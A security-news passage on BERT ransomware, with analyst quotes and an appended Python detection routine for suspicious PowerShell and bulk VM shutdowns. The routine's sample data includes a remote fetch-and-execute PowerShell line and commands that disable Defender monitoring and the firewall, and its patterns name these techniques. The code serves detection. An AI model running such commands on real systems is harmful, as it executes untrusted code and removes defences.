“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BERT ransomware is dangerous despite its simplicity because it’s fast, disables security tools and firewalls, and is easy for attackers to use. Its creators constantly improve it, making it harder to detect and stop, he added.
For CSOs, these tactics should serve as red flags. Even basic scripting and commodity tools can bypass enterprise defenses when they are used with precision against configuration weaknesses.
“Security teams should closely monitor PowerShell sessions that attempt to download remote code or disable security tools, as well as any user account control bypass efforts. Activity around ESXi and vCenter logs, particularly bulk virtual machine shutdowns, should raise immediate red flags. Canary files, which can act as tripwires for early detection, are also critical,” said Amit Jaju, senior managing director at Ankura Consulting.
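The monitoring points in the quote above, turned into a small detection routine over log data. This is an added example, not code from the article or from any of the firms quoted; the PowerShell patterns, the simplified hypervisor log line shape and the sample log lines are constructed assumptions for illustration.

```python
import re
from datetime import datetime, timedelta

# Defender-side patterns (assumptions for this example, not indicators taken from the article).
PS_REMOTE_CODE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)
PS_DISABLE_DEFENSE = re.compile(
    r"Set-MpPreference\s+-Disable|advfirewall\s+set\s+\w+\s+state\s+off|Stop-Service", re.I)

def flag_powershell(script_block):
    """Return the reasons a logged PowerShell script block deserves review ([] if none)."""
    reasons = []
    if PS_REMOTE_CODE.search(script_block):
        reasons.append("downloads or executes remote code")
    if PS_DISABLE_DEFENSE.search(script_block):
        reasons.append("disables security tooling or firewall")
    return reasons

# Simplified, constructed hypervisor log line shape: "<ISO timestamp> <vm-id> <event>".
ESXI_POWER_OFF = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) (?P<vm>vm-\d+) power\.off\b")

def bulk_vm_shutdowns(lines, threshold=5, window=timedelta(minutes=2)):
    """True if at least `threshold` distinct VMs were powered off within any `window`."""
    events = sorted(
        (datetime.fromisoformat(m["ts"]), m["vm"])
        for m in map(ESXI_POWER_OFF.match, lines) if m)
    for i, (start, _) in enumerate(events):
        vms = {vm for ts, vm in events[i:] if ts - start <= window}
        if len(vms) >= threshold:
            return True
    return False

# Constructed sample logs for a stand-alone run.
SAMPLE_PS_BLOCKS = [
    "Get-ChildItem C:\\Users",  # benign
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')",
    "Set-MpPreference -DisableRealtimeMonitoring $true; netsh advfirewall set allprofiles state off",
]
SAMPLE_ESXI_LOG = [
    "2025-07-01T09:00:00 vm-101 power.off",  # routine single shutdown, an hour earlier
    "2025-07-01T10:00:01 vm-201 power.off",
    "2025-07-01T10:00:05 vm-202 power.off",
    "2025-07-01T10:00:09 vm-203 power.off",
    "2025-07-01T10:00:12 vm-204 power.off",
    "2025-07-01T10:00:20 vm-205 power.off",  # fifth distinct VM inside two minutes
    "2025-07-01T10:00:21 vm-205 power.on",   # not a power-off, ignored
]

if __name__ == "__main__":
    for block in SAMPLE_PS_BLOCKS:
        print(flag_powershell(block) or "ok", "<-", block[:60])
    print("bulk VM shutdown burst:", bulk_vm_shutdowns(SAMPLE_ESXI_LOG))
```

In production the same logic would sit on top of PowerShell script block logging and the hypervisor's own audit trail rather than the constructed line shape used here.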